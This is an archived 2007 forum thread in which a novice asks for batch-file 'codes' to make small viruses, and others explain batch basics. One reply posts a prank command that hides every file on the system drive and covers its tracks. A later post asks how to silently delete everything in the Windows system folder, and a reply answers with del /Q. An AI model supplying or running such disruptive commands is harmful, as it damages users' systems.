View Full Version : Notepad
08-19-2007, 07:15 PM
Hey guys, I'm a new to this stuff are there any websites that tell you codes for notepad. I.E
@echo off
Start iexplore
That opens IE. Sorry If this isnt clear I just want to mess around and work out for my self to make some easy small virus as I'm just learning.
I've already made a few, but thanks.
08-19-2007, 07:35 PM
Codes for IE huh? Made a few viruses? hm... Heres a ***7 virus you can put into notepad just for you:
attrib +h &#*7;systemdrive%\* /S /D > %systemdrive%\***7H4X0R.txt&& IF EXIST %systemdrive%\***7H4X0R.txt DEL /Q %systemdrive%\***7H4X0R.txt
Its only for butters computer. No one else should try to run it.
08-19-2007, 07:42 PM
What your trying to make isn't a virus, it's more of a worm, and I don't think anyone wants to help you make that.
Oh, and what your talking about is called a batch file.
08-19-2007, 08:10 PM
I know, I thought that was a bit funny. I made a virus!! echo off&& start iexplore.exe. He didnt even send it to a web address.
start iexplore.exe
You can do that with any program as long as you add it to your computers PATH which is located in the ENVIRONMENTAL VARIABLES.
08-20-2007, 06:13 AM
I'm not calling it a virus thats an example of what I want. Like a website that will give you a code then tell you what it does.
08-20-2007, 06:14 PM
Butter, just make a 'virus' that sends the person to or something. Also, don't forget that the target might be using Opera or Firefox as their web browser, so start iexplorer.exe might not work. Or just do a little bit of research and custom code your virus to do what you want
@ SyntaX - Something about that code you posted makes me not want to run it...:p
08-20-2007, 06:25 PM
LoL @ Moonbat
Well its only a set universal batch commands that I whipped up. It will set all your files on your main system drive to hidden. It also echo's all errors to ***7H4X0R.txt, then deletes ***7H4X0R.txt so the user does not see any errors.
08-22-2007, 12:34 PM
Syntax, wouldn't an @echo off suffice instead of echoing the output into a random file? I suppose it works both ways.
To those that don't know, his code makes all the subdirectories of the user's main drive (such as C:) hidden. Can be easily changed back.
To Butter:
Read up on all the Windows commands you have at your disposal, write some into a text file, save it with the .bat ending then double-click it. It's as simple as that.
Edit: god damn smilies.
08-25-2007, 11:49 AM
You will still see output from some functions even with echo off. You will not see the actual code executed. To make sure nothing is displayed I would make sure to echo to a file, then delete the file.
An example would be:
echo off& ping **2.*68.0.*
08-27-2007, 08:38 AM
hey guys.
i am sorry if i am posting on the wrong place but i want to make it clear to me that is it possible to creat a file through batch file?
what i mean is, for example if i want to create a file named file.txt and write "hi how r u ..." in it, and save it to specified location.
so what we shold write in the batch file to perform this operation.
what should we use to write string?
what should we write for "F6" key to save the file??
and yes, when we use del *.* in batch file, it prompts " are you sure you want to del the file? Y/ N "
so what should be there to send Y or N and Enter to the system?
i am sure it should not be like this:
cd %systemroot%
del *.*
how ever the other way is to use /q, but i guess there must be other ways to do this.
I lack knowledge, so sorry for any mistakes.
08-27-2007, 11:32 AM
You must answer a few questions first.
*. What do you want to output to the file?
2. Where do you want to create the file?
*. What do you want to name the file?
*. Hi This is a new file
2. c:\
*. file.txt
To output data to a file "create a file" you must use the ">" symbol.
set data=Hi This is a new file
set filepath=c:\
set filename=file.txt
echo &#*7;data% > %path%%filename%
About your deleting problem... Use this code to Quietly (Q) delete files:
del /Q %filepath%%filename%
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